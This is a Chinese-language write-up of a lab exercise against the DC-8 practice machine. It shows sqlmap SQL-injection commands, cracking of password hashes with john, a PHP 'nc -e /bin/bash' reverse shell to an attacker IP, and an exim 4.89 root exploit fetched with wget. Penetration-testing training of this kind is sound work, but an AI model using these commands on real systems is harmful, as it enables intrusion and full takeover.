本文详细记录了一次针对Drupal 7.67版本网站的渗透测试过程,包括信息收集(主机扫描、端口扫描、目录扫描、页面探测)、SQL注入利用、密文爆破、反弹shell及提权。通过SQLmap获取数据库信息,使用john爆破密码,最终通过exim4的漏洞实现提权,并找到flag。
目录
DC-8靶场下载地址https://www.five86.com/downloads/DC-8.zip
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
dirsearch -u 192.168.120.143 -e * -x 403 --random-agent
4. 页面探测
又是Drupal
确认Drupal版本7.67,该版本网上找不到漏洞,但是有源码,额,总不会让我们去挖这个的漏洞吧!?
探索发现,以前点那啥蓝色字体的时候会转跳到Drupal的官方,而这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞
二. 渗透过程
1. SQL注入
在nid参数后面加'
出现了SQL报错,接下来就上SQLmap跑了,爆一下数据库
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch --current-db
爆表
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables
有一堆表,但是有用的只有users,接着爆字段名
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns
接着看字段
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump
得到了两个用户,还有hash密文,我们建一个文件,将两个密文保存起来
2. 爆破密文
Drupal的hash密文是经过特殊加密的,用john进行爆破
john hash.txt
爆破出了一个密码turtle
3. 反弹shell
测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码
不多bb,直接写入反弹shell
<?php
exec("nc -e /bin/bash 192.168.120.129 6666");
?> 
将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
反弹shell成功!
4. 提权
找查一下suid权限的二进制文件
find / -perm -4000 -print 2>/dev/null
之前的DC靶场机exim4提权都失败了,这里再试一下,先看一下版本
exim --version
exim 4.89
接着找一下漏洞
searchsploit exim 4 
复制一下文件
cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh 开启http服务
python -m http.server 8888 
在DC-7中下载该文件,先跳到tmp目录
cd /tmp
wget 192.168.120.129:8888/hack.sh
接着查看一下文件权限
ls -la
可以看到文件是不可执行的,我们可以用chmod命令赋予执行权限
chmod 777 hack.sh
接着根据sh脚本提示,执行文件
./hack.sh -m netcat
提权成功,有点奇怪就是过一会root权限就消失了,所以动作要快
5. 找查flag
在root目录下发现flag文件
拿到flag!!!
扫一扫
1935
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
